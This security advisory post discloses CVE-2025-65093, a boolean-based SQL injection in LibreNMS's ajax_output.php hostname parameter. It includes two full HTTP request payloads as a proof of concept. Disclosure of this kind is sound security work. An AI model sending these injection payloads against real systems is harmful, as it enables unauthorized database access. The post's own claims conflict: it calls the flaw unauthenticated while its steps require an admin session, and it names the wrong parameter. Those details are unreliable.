Featured image of post CVE-2025-65093
SQL Injection Critical LibreNMS Security WebApp

CVE-2025-65093

SQL Injection

CVE-2025-65093: SQL Injection (Boolean-Based) Vulnerability in hostname Parameter on ajax_output.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-65093

Summary

A SQL Injection vulnerability was discovered in the hostname parameter of the ajax_output.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the hostname parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.

PoC

Vulnerable Endpoint: ajax_output.php

Parameter: id

  • Authenticate with an administrator account.
    The discovery endpoint /ajax_output.php is accessible only to users with admin-level privileges.
  • Access the following URL with the payload that evaluates to TRUE:

1
2
3
4
5
6
7
8
9

GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=1+AND+'1'='1 HTTP/1.1
Host: 10.0.5.5:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://10.0.5.5:8000/device/3/capture
Cookie: laravel_session=[ADMIN_SESSION_COOKIE]
Priority: u=0

  • Observe that the system returns the expected data and triggers the discovery process.

  • Now repeat the request with a FALSE condition:

1
2
3
4
5
6
7
8
9

GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=2+AND+'1'='1 HTTP/1.1
Host: 10.0.5.5:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://10.0.5.5:8000/device/3/capture
Cookie: laravel_session=[SESSION COOKIE]
Priority: u=0

  • Observe that the response is altered: no device is found, and no discovery is triggered.

The difference in output confirms that the injected Boolean logic is being executed by the database.

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9

Finder

Marcelo Queiroz

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy